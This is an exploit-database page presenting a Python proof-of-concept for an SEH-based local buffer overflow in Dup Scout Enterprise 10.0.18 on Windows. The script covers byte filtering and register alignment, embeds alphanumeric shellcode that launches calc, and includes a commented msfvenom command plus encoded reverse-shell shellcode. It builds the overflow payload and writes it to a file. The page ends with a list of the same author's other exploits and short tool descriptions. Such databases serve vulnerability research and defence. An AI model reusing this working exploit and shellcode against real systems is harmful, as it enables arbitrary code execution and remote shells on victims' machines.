Search for hundreds of thousands of exploits

"Dup Scout Enterprise 10.0.18 - 'Input Directory' Local Buffer Overflow (SEH)"

Author

Exploit author

"Miguel Mendez Z"

Platform

Exploit platform

windows

Release date

Exploit published date

2017-11-29

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
#!/usr/bin/python
import struct

########################################################################################################
# Exploit Author: Miguel Mendez Z
# Exploit Title: Dup Scout Enterprise v10.0.18 "Input Directory" Local Buffer Overflow - SEH Unicode
# Date: 29-11-2017
# Software: Dup Scout Enterprise
# Version: v10.0.18
# Vendor Homepage: http://www.dupscout.com
# Software Link: http://www.dupscout.com/setups/dupscoutent_setup_v10.0.18.exe
# Tested on: Windows 7 x86
########################################################################################################


'''
[+] Paso 1
Bytes Validos:
\x21\x23\x2a\x2b\x2d\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a
\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f
\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x61\x62\x63\x64\x65
\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75
\x76\x77\x78\x79\x7a
----------
[+] Paso 2:
Align ESP:
popad * 49
----------
[+] Paso 3:
Assembly Align EAX:
xor eax,eax
push esp
pop eax
pop ecx
add eax 1c
jmp eax -----> (inicio shellcode)
----------
[+] Paso 4:
Codificacion:
and eax,554E4D4A
and eax,2A313235
sub eax,65656565
sub eax,65654C65
sub eax,54363176
push eax
sub eax,33354D35
sub eax,2A707737
push eax

Byte Paste:
254A4D4E55253532312A2D656565652D654C65652D76313654502D354D35332D3777702A50
'''

popad = "\x61"*49
alignEsp = popad+(
	"\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31"
	"\x2A\x2D\x65\x65\x65\x65\x2D\x65\x4C"
	"\x65\x65\x2D\x76\x31\x36\x54\x50\x2D"
	"\x35\x4D\x35\x33\x2D\x37\x77\x70\x2A"
	"\x50"
	)

'''
msfvenom -p windows/exec CMD=calc > calc.raw && ./alpha2 eax < calc.raw)
msfvenom -p windows/exec CMD=calc -e x86/alpha_mixed  BufferRegister=EAX -f python
'''
shellcodeTest = (
	"PYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8A"
	"BuJIylIxNbWpwpwpQpMYyup1kp3TNk0PTpLKPRflLKv2uDnk"
	"42uxtOoGaZwVea9oNLGL3QCLtBFLUpo1zoVmgqKwKRxrrrrw"
	"LK62tPLKBjUlnk0LdQBXJCPHEQHQRqlK0YepwqN3lKRivxKS"
	"wJaYLKTtLKvaXVvQKOLlKqhO6meQkw4xkP1ekFESqmxxWKam"
	"7TBUKTBxNkchgTfaN3PfNkDLRklKshuLc1n3nk6dNk7qJpNi"
	"QT14Q4aKSkSQV91JF1KOKPqO1O2zLKfrxknmqMrJS1LMNeoB"
	"Wpgp5PpP58VQNk2Oow9oXUoKxpNUoRrvU8oVoeoMMMKOxUWL"
	"eV3L4JMPKKKPrUTEoKswtSRRROcZePrsKOZu3SSQPlPcePA"
	)

#msfvenom -p windows/shell_reverse_tcp LHOST=127.0.0.1 LPORT=1337 -e x86/alpha_mixed  BufferRegister=EAX -f python
shellcode  = "\x50\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
shellcode += "\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30"
shellcode += "\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42"
shellcode += "\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
shellcode += "\x4b\x4c\x79\x78\x6f\x72\x57\x70\x77\x70\x55\x50\x45"
shellcode += "\x30\x4d\x59\x49\x75\x46\x51\x4b\x70\x55\x34\x6e\x6b"
shellcode += "\x70\x50\x30\x30\x4e\x6b\x56\x32\x46\x6c\x6c\x4b\x66"
shellcode += "\x32\x46\x74\x6e\x6b\x62\x52\x44\x68\x34\x4f\x4f\x47"
shellcode += "\x73\x7a\x45\x76\x55\x61\x39\x6f\x4c\x6c\x47\x4c\x35"
shellcode += "\x31\x53\x4c\x35\x52\x44\x6c\x65\x70\x5a\x61\x58\x4f"
shellcode += "\x74\x4d\x45\x51\x6a\x67\x48\x62\x4b\x42\x46\x32\x62"
shellcode += "\x77\x4e\x6b\x51\x42\x62\x30\x4c\x4b\x70\x4a\x37\x4c"
shellcode += "\x6e\x6b\x32\x6c\x74\x51\x33\x48\x6a\x43\x71\x58\x66"
shellcode += "\x61\x6a\x71\x50\x51\x4e\x6b\x63\x69\x75\x70\x37\x71"
shellcode += "\x7a\x73\x4c\x4b\x52\x69\x45\x48\x58\x63\x54\x7a\x30"
shellcode += "\x49\x6e\x6b\x34\x74\x4e\x6b\x56\x61\x49\x46\x34\x71"
shellcode += "\x69\x6f\x4e\x4c\x6f\x31\x78\x4f\x54\x4d\x66\x61\x68"
shellcode += "\x47\x76\x58\x6d\x30\x72\x55\x48\x76\x74\x43\x63\x4d"
shellcode += "\x48\x78\x65\x6b\x31\x6d\x74\x64\x42\x55\x58\x64\x31"
shellcode += "\x48\x6c\x4b\x53\x68\x47\x54\x37\x71\x39\x43\x73\x56"
shellcode += "\x4e\x6b\x66\x6c\x72\x6b\x6c\x4b\x36\x38\x35\x4c\x43"
shellcode += "\x31\x38\x53\x6c\x4b\x35\x54\x4c\x4b\x67\x71\x58\x50"
shellcode += "\x4c\x49\x72\x64\x75\x74\x66\x44\x43\x6b\x63\x6b\x31"
shellcode += "\x71\x46\x39\x32\x7a\x32\x71\x79\x6f\x6b\x50\x43\x6f"
shellcode += "\x31\x4f\x50\x5a\x4c\x4b\x52\x32\x48\x6b\x6e\x6d\x31"
shellcode += "\x4d\x45\x38\x55\x63\x74\x72\x33\x30\x47\x70\x53\x58"
shellcode += "\x43\x47\x74\x33\x47\x42\x31\x4f\x63\x64\x70\x68\x62"
shellcode += "\x6c\x62\x57\x74\x66\x43\x37\x59\x6f\x58\x55\x4d\x68"
shellcode += "\x6e\x70\x55\x51\x33\x30\x53\x30\x55\x79\x59\x54\x53"
shellcode += "\x64\x56\x30\x53\x58\x56\x49\x4f\x70\x30\x6b\x33\x30"
shellcode += "\x49\x6f\x4a\x75\x62\x70\x66\x30\x72\x70\x42\x70\x51"
shellcode += "\x50\x52\x70\x71\x50\x46\x30\x53\x58\x58\x6a\x36\x6f"
shellcode += "\x79\x4f\x4b\x50\x59\x6f\x6e\x35\x6e\x77\x61\x7a\x56"
shellcode += "\x65\x72\x48\x71\x6f\x75\x50\x45\x50\x46\x61\x63\x58"
shellcode += "\x53\x32\x37\x70\x56\x65\x47\x49\x6f\x79\x4a\x46\x53"
shellcode += "\x5a\x74\x50\x66\x36\x33\x67\x50\x68\x6e\x79\x6e\x45"
shellcode += "\x54\x34\x31\x71\x6b\x4f\x78\x55\x4f\x75\x6f\x30\x64"
shellcode += "\x34\x56\x6c\x49\x6f\x50\x4e\x36\x68\x64\x35\x58\x6c"
shellcode += "\x43\x58\x6c\x30\x6f\x45\x4c\x62\x30\x56\x39\x6f\x59"
shellcode += "\x45\x35\x38\x73\x53\x70\x6d\x35\x34\x45\x50\x6e\x69"
shellcode += "\x49\x73\x70\x57\x56\x37\x73\x67\x56\x51\x39\x66\x31"
shellcode += "\x7a\x75\x42\x36\x39\x36\x36\x58\x62\x39\x6d\x31\x76"
shellcode += "\x49\x57\x52\x64\x46\x44\x75\x6c\x53\x31\x63\x31\x6e"
shellcode += "\x6d\x31\x54\x57\x54\x42\x30\x5a\x66\x35\x50\x62\x64"
shellcode += "\x30\x54\x42\x70\x76\x36\x33\x66\x30\x56\x31\x56\x71"
shellcode += "\x46\x50\x4e\x56\x36\x66\x36\x32\x73\x31\x46\x45\x38"
shellcode += "\x33\x49\x5a\x6c\x77\x4f\x6f\x76\x4b\x4f\x58\x55\x6d"
shellcode += "\x59\x4d\x30\x42\x6e\x53\x66\x33\x76\x59\x6f\x66\x50"
shellcode += "\x63\x58\x66\x68\x6d\x57\x77\x6d\x31\x70\x39\x6f\x49"
shellcode += "\x45\x4d\x6b\x48\x70\x38\x35\x4d\x72\x42\x76\x31\x78"
shellcode += "\x69\x36\x7a\x35\x6d\x6d\x4d\x4d\x59\x6f\x5a\x75\x37"
shellcode += "\x4c\x53\x36\x33\x4c\x44\x4a\x6f\x70\x59\x6b\x4b\x50"
shellcode += "\x54\x35\x56\x65\x6d\x6b\x43\x77\x72\x33\x62\x52\x30"
shellcode += "\x6f\x51\x7a\x37\x70\x32\x73\x4b\x4f\x59\x45\x41\x41"

offset = shellcodeTest+"\x41"*(4144-len(shellcodeTest))
nseh   = "\x71\x20" # jno short 34
nseh  += "\x70\x20" # jo short 34
seh    = struct.pack("<L",0x6521636C) # pop ebx # pop ecx # ret (Bytes Buenos)
junk   = "\x42"*26+alignEsp+"\x42"*6000

payload = offset+nseh+seh+junk

print "\nSize Buffer: "+str(len(offset))
print "Size Payload: "+str(len(payload))
print "\n--------------EXPLOIT--------------\n"
print payload
print "\n----------------------------\n"

file=open('poc_dup.txt','w')
file.write(payload)
file.close()

# @s1kr10s
Release DateTitleTypePlatformAuthor
2020-03-16"Enhanced Multimedia Router 3.0.4.27 - Cross-Site Request Forgery (Add Admin)"webappsasp"Miguel Mendez Z"
2019-05-07"Easy Chat Server 3.1 - 'message' Denial of Service (PoC)"doswindows"Miguel Mendez Z"
2018-10-04"NICO-FTP 3.0.1.19 - Buffer Overflow (SEH) (ASLR Bypass)"localwindows_x86"Miguel Mendez Z"
2018-07-16"VelotiSmart WiFi B-380 Camera - Directory Traversal"webappshardware"Miguel Mendez Z"
2018-01-30"LabF nfsAxe 3.7 TFTP Client - Local Buffer Overflow"doswindows"Miguel Mendez Z"
2017-11-29"Dup Scout Enterprise 10.0.18 - 'Input Directory' Local Buffer Overflow (SEH)"remotewindows"Miguel Mendez Z"
2017-11-16"LanSweeper 6.0.100.75 - Cross-Site Scripting"webappsaspx"Miguel Mendez Z"
2017-06-20"BOA Web Server 0.94.14rc21 - Arbitrary File Access"webappslinux"Miguel Mendez Z"
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/43202/?format=json')

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.